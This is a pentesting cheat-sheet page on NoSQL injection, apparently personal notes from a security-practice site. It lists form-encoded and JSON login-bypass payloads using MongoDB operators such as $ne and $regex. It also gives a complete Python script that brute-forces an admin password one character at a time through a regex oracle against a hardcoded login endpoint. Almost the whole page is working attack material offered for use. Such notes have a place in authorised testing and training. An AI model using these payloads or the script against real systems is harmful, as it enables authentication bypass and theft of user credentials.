NoSQLi

##-----| Content-Type: application/x-www-form-urlencoded
admin'||'1==1
username[$ne]=admin&password[$ne]=pass

# With regex; increase x++
## Count username's character
username[$regex]=^.{x}$&password[$ne]=pass
## Bruteforce username; change x to a,b,c,d...
username[$regex]=^{x}.*&password[$ne]=pass

Node / MongoDB

##-----| Content-Type: application/json

{
    "user" :  "admin",
    "password" : { "$ne" : "passw"}
}

{
    "username" : { "$ne" : "admin"},
    "password" : { "$ne" : "passw"}
}

{
    "user" :  "admin",
    "password" : { "$regex" : ".*"}
}

Bruteforce login password

import sys
import json
import string
import requests as req

proxies = { 'http': 'http://127.0.0.1:8080' }
url = "http://10.10.11.139:5000/login"
par_user = "user"
par_user_value = "admin"
par_pass = "password"
fail_respond = "Invalid"

def login(passwd):
    payload = '{ "$regex": "%s" }' % passwd
    data = { par_user:par_user_value, par_pass: json.loads(payload)}
    request = req.post(url,json=data)  #, proxies=proxies)
    if fail_respond in request.text:
        return False
    return True

passwd = '^'
finished = False
string = string.ascii_letters + string.digits + string.punctuation
while finished == False:
    for i in string:
        sys.stdout.write(f"\r{passwd}{i}")
        if login(f"{passwd}{i}"):
            passwd += i
            if login(f"{passwd}$"):
                print ("\r\n\nPassword is : "+ passwd[1:])
                finished = True
                break
            break

PreviousSQLi NextLFI / XXE

Last updated 2 years ago